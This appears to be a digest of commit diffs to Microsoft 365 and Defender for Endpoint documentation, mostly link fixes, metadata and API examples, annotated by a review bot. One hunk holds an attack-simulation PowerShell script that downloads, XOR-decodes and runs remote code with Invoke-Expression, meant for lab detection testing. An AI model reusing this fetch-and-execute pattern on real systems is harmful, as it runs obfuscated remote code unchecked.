> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scans Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-powershell.md
For more information about how to use PowerShell with Microsoft Defender Antivir
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scans Wmi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-wmi.md
For more information and allowed parameters, see [Windows Defender WMIv2 APIs](/
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scans https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans.md
This optimization applies to machines running Windows 10 Anniversary Update (ver
## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Onboard non-Windows devices](configure-endpoints-non-windows.md)
+- [Onboard non-Windows devices](configure-endpoints-non-windows.md)
security Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/score.md
Score|Double|The current score.
Time|DateTime|The date and time in which the call for this API was made.
RbacGroupName|String|The device group name.
RbacGroupId|String|The device group ID.
security Server Migration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/server-migration.md
If you're using Microsoft Defender for Cloud, you can leverage the automated upg
## Group Policy configuration

For configuration using Group Policy, ensure you're using the latest ADMX files in your central store to access the correct Defender for Endpoint policy options. See [How to create and manage the Central Store for Group Policy Administrative Templates in Windows](/troubleshoot/windows-client/group-policy/create-and-manage-central-store) and download the latest files **for use with Windows 10**.
security Set Device Value https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/set-device-value.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
  "DeviceValue" : "High"
}
```
security Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/software.md
Last updated 12/18/2020
|exposedMachines|Long|Number of exposed devices|
|impactScore|Double|Exposure score impact of this software|
security Specify Additional Definitions Network Traffic Inspection Mdav https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/specify-additional-definitions-network-traffic-inspection-mdav.md
You can specify additional definition sets for network traffic inspection using
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md) - [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md)-- [How to create and deploy anti-malware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service)
+- [How to create and deploy anti-malware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service)
security Specify Cloud Protection Level Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/specify-cloud-protection-level-microsoft-defender-antivirus.md
Cloud protection works together with Microsoft Defender Antivirus to deliver pro
- [Onboard non-Windows devices to Defender for Endpoint](configure-endpoints-non-windows.md)
- [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md)
security Stop And Quarantine File https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/stop-and-quarantine-file.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
  "Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9"
}
```
security Supported Capabilities By Platform https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/supported-capabilities-by-platform.md
The following table gives information about the supported Microsoft Defender for
> [!NOTE]
> Windows 7, 8.1, Windows Server 2008 R2 include support for the EDR sensor, and AV using System Center Endpoint Protection (SCEP).
security Switch To Mde Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-overview.md
The process of migrating to Defender for Endpoint can be divided into three phas
## Next step

- Proceed to [Prepare for your migration](switch-to-mde-phase-1.md).
security Switch To Mde Phase 1 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-1.md
To enable communication between your devices and Defender for Endpoint, you migh
**Congratulations**! You've completed the **Prepare** phase of [switching to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)!

- [Proceed to set up Defender for Endpoint](switch-to-mde-phase-2.md).
security Switch To Mde Phase 2 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-2.md
Device groups, device collections, and organizational units enable your security
**Congratulations**! You've completed the Setup phase of [migrating to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)!

- [Proceed to Phase 3: Onboard to Defender for Endpoint](switch-to-mde-phase-3.md)
security Switch To Mde Phase 3 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-3.md
To learn more, see [Device inventory](machines-view-overview.md).
**Congratulations**! You have completed your [migration to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)!

- [Manage Defender for Endpoint, post migration](manage-mde-post-migration.md).
security Switch To Mde Troubleshooting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-troubleshooting.md
If you are using a non-Microsoft antivirus/antimalware solution on Windows Serve
- [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md)
- [Onboarding tools and methods for Windows devices in Defender for Endpoint](configure-endpoints.md)
security Tamper Resiliency https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tamper-resiliency.md
If [Windows Defender Application Control](/windows/security/threat-protection/wi
security Tamperprotection Macos https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tamperprotection-macos.md
configuration_is_managed : false
```console
$ sudo grep -F '[{tamperProtection}]: Feature state:' /Library/Logs/Microsoft/mdatp/microsoft_defender_core.log | tail -n 1
```
security Techniques Device Timeline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/techniques-device-timeline.md
To view only either events or techniques, select **Filters** from the device tim
- [View and organize the Devices list](machines-view-overview.md)
- [Microsoft Defender for Endpoint device timeline event flags](device-timeline-event-flag.md)
security Technological Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/technological-partners.md
The following are the solution's categories:
- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview) - [Connect apps to get visibility and control|Microsoft Docs](/defender-cloud-apps/enable-instant-visibility-protection-and-governance-actions-for-your-apps)-- [Partner applications in Microsoft Defender for Endpoint|Microsoft Docs](partner-applications.md)
+- [Partner applications in Microsoft Defender for Endpoint|Microsoft Docs](partner-applications.md)
security Threat Analytics Analyst Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-analytics-analyst-reports.md
Advanced hunting queries in the analyst reports have been vetted by Microsoft an
- [Threat analytics overview](threat-analytics.md)
- [Proactively find threats with advanced hunting](advanced-hunting-overview.md)
- [Custom detection rules](custom-detection-rules.md)
security Threat Analytics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-analytics.md
When using the reports, keep the following in mind:
- [Proactively find threats with advanced hunting](advanced-hunting-overview.md)
- [Understand the analyst report section](threat-analytics-analyst-reports.md)
- [Assess and resolve security weaknesses and exposures](next-gen-threat-and-vuln-mgt.md)
security Threat Indicator Concepts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-indicator-concepts.md
IOCs have a many-to-one relationship with alert definitions such that an alert d
- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
- [Manage indicators](manage-indicators.md)
security Threat Protection Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-protection-integration.md
With Microsoft 365 Defender, Microsoft Defender for Endpoint, and various Micros
- [Microsoft 365 Defender overview](/microsoft-365/security/defender/microsoft-365-defender)
- [Turn on Microsoft 365 Defender](/microsoft-365/security/defender/m365d-enable)
- [Protect users, data, and devices with Conditional Access](conditional-access.md)
security Threat Protection Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-protection-reports.md
For example, to show data about high-severity alerts only:
## Related topic

- [Device health and compliance report](device-health-reports.md)
security Ti Indicator https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ti-indicator.md
For more information on the description of the response action types, see [Creat
- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Time Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/time-settings.md
The following date and time formats are currently not supported:
##### Decimal symbol used in numbers

The decimal symbol is always a dot, even if a comma is selected in the **Numbers** format settings in **Region** settings. For example, 15,5K is displayed as 15.5K.
security Troubleshoot Asr Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-asr-rules.md
Title: Report and troubleshoot Microsoft Defender for Endpoint ASR Rules description: This topic describes how to report and troubleshoot Microsoft Defender for Endpoint ASR Rules
-keywords: Attack surface reduction rules, asr, hips, host intrusion prevention system, protection rules, anti-exploit, antiexploit, exploit, infection prevention, microsoft defender for endpoint
-search.product: eADQiWindows 10XVcnh
-ms.pagetype: security
-ms.sitesec: library
ms.localizationpriority: medium audience: ITPro-+
- m365-security - tier3 search.appverid: met150 Previously updated : 12/05/2022 Last updated : 07/18/2023 # Report and troubleshoot Microsoft Defender for Endpoint ASR Rules
Through advanced hunting, it's possible to extract ASR rules information, create
ASR rule events can be queried from the DeviceEvents table in the advanced hunting section of Microsoft 365 Defender. For example, a simple query such as the one below reports all events from the last 30 days that have ASR rules as their data source and summarizes them by ActionType count, where ActionType in this case is the codename of the ASR rule.
+```kusto
+DeviceEvents
+| where Timestamp > ago(30d)
+| where ActionType startswith "Asr"
+| summarize EventCount=count() by ActionType
+```
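Review bot: the prose above describes the output as a summary "by the ActionType count", but the `summarize` line names the result column `EventCount`, so the text and the query use different names for the same value; either describe the column as `EventCount` in the sentence or alias the column to match the description, so readers can relate the screenshot and the query to the text.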
:::image type="content" source="images/adv-hunt-sc-2new.png" alt-text="The Advanced hunting page" lightbox="images/adv-hunt-sc-2new.png":::
The most relevant files are as follows:
- **MPOperationalEvents.txt**: This file contains the same level of information found in Event Viewer for Windows Defender's Operational log.
- **MPRegistry.txt**: In this file you can analyze all the Windows Defender configurations that were current at the moment the support logs were captured.
- **MPLog.txt**: This log contains more verbose information about all the actions/operations of Windows Defender.
security Troubleshoot Asr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-asr.md
When you report a problem with attack surface reduction rules, you're asked to c
- [Attack surface reduction rules](attack-surface-reduction.md)
- [Enable attack surface reduction rules](enable-attack-surface-reduction.md)
- [Evaluate attack surface reduction rules](evaluate-attack-surface-reduction.md)
security Troubleshoot Cloud Connect Mdemac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-cloud-connect-mdemac.md
The output from this command should be similar to:
OK https://x.cp.wd.microsoft.com/api/report
OK https://cdn.x.cp.wd.microsoft.com/ping
```
security Troubleshoot Collect Support Log https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-collect-support-log.md
If you also require Defender Antivirus support logs (MpSupportFiles.cab), then f
- [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md)
- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
- [Understand the analyzer HTML report](analyzer-report.md)
security Troubleshoot Exploit Protection Mitigations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-exploit-protection-mitigations.md
If you haven't already, it's a good idea to download and use the [Windows Securi
* [Enable exploit protection](enable-exploit-protection.md)
* [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
* [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security Troubleshoot Live Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-live-response.md
Refer to the articles below to fully understand the WpnService service behavior
- [Windows Push Notification Services (WNS) overview](/windows/uwp/design/shell/tiles-and-notifications/windows-push-notification-services--wns--overview)
- [Enterprise Firewall and Proxy Configurations to Support WNS Traffic](/windows/uwp/design/shell/tiles-and-notifications/firewall-allowlist-config)
- [Microsoft Push Notifications Service (MPNS) Public IP ranges](https://www.microsoft.com/download/details.aspx?id=44535)
security Troubleshoot Mdatp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-mdatp.md
When you use Microsoft Defender for Cloud to monitor servers, a Microsoft Defend
- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
- [Review events and errors using Event Viewer](event-error-codes.md)
security Troubleshoot Np https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-np.md
You can configure the registry key by using PowerShell, Microsoft Configuration
- [Evaluate network protection](evaluate-network-protection.md)
- [Enable network protection](enable-network-protection.md)
- [Address false positives/negatives in Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
security Troubleshoot Onboarding Error Messages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-onboarding-error-messages.md
If you encounter issues with accessing the portal, missing data, or restricted a
- `https://secure.aadcdn.microsoftonline-p.com`
- `https://security.microsoft.com`
- `https://static2.sharepointonline.com`
security Troubleshoot Onboarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-onboarding.md
The steps below provide guidance for the following scenario:
- [Troubleshoot Microsoft Defender for Endpoint](troubleshoot-mdatp.md)
- [Onboard devices](onboard-configure.md)
- [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md)
security Troubleshoot Performance Issues https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-performance-issues.md
The command-line tool *wpr.exe* is part of the operating system starting with Wi
- [Collect Microsoft Defender Antivirus diagnostic data](collect-diagnostic-data.md)
- [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)
- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Troubleshoot Reporting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-reporting.md
If the above prerequisites have all been met, you might need to proceed to the n
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)
security Troubleshoot Security Config Mgt https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-security-config-mgt.md
For Security Management for Microsoft Defender for Endpoint on Windows Server 20
## Related topic
- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)
security Troubleshoot Siem https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-siem.md
If you encounter an error when trying to enable the SIEM connector application,
- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
- [Pull detections to your SIEM tools](configure-siem.md)
security Troubleshooting Mode Scenarios https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshooting-mode-scenarios.md
For more information, see [Use network protection to help prevent connections to
- [Detect and block potentially unwanted applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md)
- [Get an overview of Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/)
- [Better together: Microsoft Defender Antivirus and Microsoft Defender for Endpoint](why-use-microsoft-defender-antivirus.md)
security Tune Performance Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tune-performance-defender-antivirus.md
If you're looking for Antivirus-related information for other platforms, see:
- [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
- [Configure Defender for Endpoint on Android features](android-configure.md)
- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Turn On Definition Retirement https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/turn-on-definition-retirement.md
You can configure definition retirement using Group Policy. Definition retiremen
> [!TIP]
> Are you using Group Policy Objects on premises? See how they translate in the cloud. [Analyze your on-premises group policy objects using Group Policy analytics in Microsoft Intune](/mem/intune/configuration/group-policy-analytics).
security Unisolate Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/unisolate-machine.md
```http
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
```
To isolate a device, see [Isolate device](isolate-machine.md).
security Unrestrict Code Execution https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/unrestrict-code-execution.md
```http
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
```
To restrict code execution on a device, see [Restrict app execution](restrict-code-execution.md).
security Update Agent Mma Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/update-agent-mma-windows.md
A new agent was released in April 2022 for Windows Server 2012 R2 and Windows Se
- [Microsoft Defender for Endpoint deployment overview](deployment-phases.md)
- [Onboard to the Microsoft Defender for Endpoint service](onboarding.md)
security Update Alert https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/update-alert.md
```http
PATCH https://api.securitycenter.microsoft.com/api/alerts/121688558380765161_213
"comment": "Resolve my alert and assign to secop2" }
```
security Update Machine Method https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/update-machine-method.md
```http
PATCH https://api.securitycenter.microsoft.com/api/machines/{machineId}
] }
```
security Upload Library https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/upload-library.md
description"
## Related topic -- [Run live response](run-live-response.md)
+- [Run live response](run-live-response.md)
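Review bot: the removed and added `- [Run live response](run-live-response.md)` lines read identically here, so this hunk looks like a whitespace or line-ending change only; if that is the case, say so in the commit message so the no-op diff is not mistaken for a link change.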
security Use Group Policy Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-group-policy-microsoft-defender-antivirus.md
The following table lists commonly used Group Policy settings that are available
- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Use Intune Config Manager Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-intune-config-manager-microsoft-defender-antivirus.md
You can use the Microsoft Intune family of products to configure Microsoft Defen
>
> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security Use Powershell Cmdlets Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-powershell-cmdlets-microsoft-defender-antivirus.md
Omit the `-online` parameter to get locally cached help.
- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
- [Microsoft Defender Antivirus Cmdlets](/powershell/module/defender)
security Use Wmi Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-wmi-microsoft-defender-antivirus.md
You can [configure which settings can be overridden locally with local policy o
- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security User Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/user-roles.md
For more information on the available commands, see [Investigate devices using L
- [User basic permissions to access the portal](basic-permissions.md)
- [Create and manage device groups](machine-groups.md)
security User https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/user.md
Method|Return Type|Description
:---|:---|:---
[List User related alerts](get-user-related-alerts.md)|[alert](alerts.md) collection|List all the alerts that are associated with a [user](user.md).
[List User related devices](get-user-related-machines.md)|[machine](machine.md) collection|List all the devices that were logged on by a [user](user.md).
security View Incidents Queue https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/view-incidents-queue.md
For example: *Multi-stage incident on multiple endpoints reported by multiple so
- [Manage incidents](manage-incidents.md)
- [Investigate incidents](investigate-incidents.md)
security Vulnerability https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/vulnerability.md
exploitVerified|Boolean|Exploit is verified to work
exploitInKit|Boolean|Exploit is part of an exploit kit
exploitTypes|String collection|Exploit impact. Possible values are: "Local privilege escalation", "Denial of service", "Local"
exploitUris|String collection|Exploit source URLs
security Web Content Filtering https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-content-filtering.md
If you are using Microsoft 365 Business Premium or Microsoft Defender for Busine
- [Monitor web security](web-protection-monitoring.md)
- [Respond to web threats](web-protection-response.md)
- [Requirements for Network Protection](web-content-filtering.md)
security Web Protection Monitoring https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-protection-monitoring.md
Select a domain to view the list of devices that have attempted to access URLs i
- [Web content filtering](web-content-filtering.md)
- [Web threat protection](web-threat-protection.md)
- [Respond to web threats](web-protection-response.md)
security Web Protection Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-protection-overview.md
For more information on how to submit false positives/negatives, see [Address fa
|[Web threat protection](web-threat-protection.md)|Stop access to phishing sites, malware vectors, exploit sites, untrusted or low-reputation sites, and sites that you have blocked.|
|[Web content filtering](web-content-filtering.md)|Track and regulate access to websites based on their content categories.|
security Web Protection Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-protection-response.md
With web protection in Microsoft Defender for Endpoint, your end users will be p
- [Web content filtering](web-content-filtering.md)
- [Web threat protection](web-threat-protection.md)
- [Monitor web security](web-protection-monitoring.md)
security Web Threat Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-threat-protection.md
The following procedure describes how to configure web threat protection using t
- [Monitor web security](web-protection-monitoring.md)
- [Respond to web threats](web-protection-response.md)
- [Network protection](network-protection.md)
security Whats New In Microsoft Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/whats-new-in-microsoft-defender-endpoint.md
For more information on Microsoft Defender for Endpoint on specific operating sy
security Why Use Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/why-use-microsoft-defender-antivirus.md
Although you can use a non-Microsoft antivirus solution with Microsoft Defender
- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security Windows Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/windows-whatsnew.md
See also:
- [What's new in Defender for Endpoint on macOS](mac-whatsnew.md)
- [What's new in Defender for Endpoint on iOS](ios-whatsnew.md)
- [What's new in Defender for Endpoint on Linux](linux-whatsnew.md)
security Zero Trust With Microsoft Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/zero-trust-with-microsoft-defender-endpoint.md
For the steps to deploy Intune for Microsoft 365 with Zero Trust, see the [Manag
For other Microsoft 365 capabilities that contribute to a strong Zero Trust strategy and architecture, see [Zero Trust deployment plan with Microsoft 365](../microsoft-365-zero-trust.md).
-For an overview of Zero Trust for Microsoft 365 Defender services, see [Zero Trust with Microsoft 365 Defender](../defender/zero-trust-with-microsoft-365-defender.md).
+For an overview of Zero Trust for Microsoft 365 Defender services, see [Zero Trust with Microsoft 365 Defender](../defender/zero-trust-with-microsoft-365-defender.md).
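Review bot: the removed and added "For an overview of Zero Trust for Microsoft 365 Defender services" lines are identical as shown, so this hunk appears to be a whitespace or line-ending change only; note that in the commit message so reviewers don't look for a wording or link change that isn't there.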
security Eval Defender Investigate Respond Simulate Attack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-simulate-attack.md
To run the attack scenario simulation:
4. Copy the following simulation script:
```powershell
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
- = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
- -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ ;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
+ $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i]; $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes)) ```
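Review bot: the added lines change the script's payload host from `winatpmanagement.windows.com` to `wcdstaticfilesprdeus.blob.core.windows.net` and split the first statement onto its own line, which leaves the second added line starting with a bare `;$xor = ...`; PowerShell accepts that, but it reads as a stray separator, so keep the `;` at the end of the `SecurityProtocol` line instead. Because step 4 tells readers to copy and run this script, the step text should also call out the host change, so anyone who allow-listed the old host in a proxy for the simulation knows to update that rule.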
solutions Allow Members To Send As Or Send On Behalf Of Group https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/allow-members-to-send-as-or-send-on-behalf-of-group.md
Title: "Allow members to send as or send on behalf of a group"
- Previously updated : 02/18/2020
+ Last updated : 07/18/2023
f1.keywords: NOCSH
syntex Ocr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/syntex/ocr.md
Previously updated : 07/01/2023
Last updated : 07/18/2023
audience: admin
description: Learn how to set up and manage optical character recognition in Mic
# Set up and manage optical character recognition in Microsoft Syntex
-Before you can use the optical character recognition (OCR) service in Microsoft Syntex, it must be set up in the Microsoft 365 admin center.
+The optical character recognition (OCR) service for Microsoft Syntex is set up in the Microsoft 365 admin center.
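Review bot: the rewritten sentence drops the dependency the removed line stated (the OCR service must be set up before it can be used) and keeps only where setup happens; keep that requirement, for example as the first item under the Prerequisites heading that follows, so readers don't skip setup and then wonder why OCR isn't available.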
## Prerequisites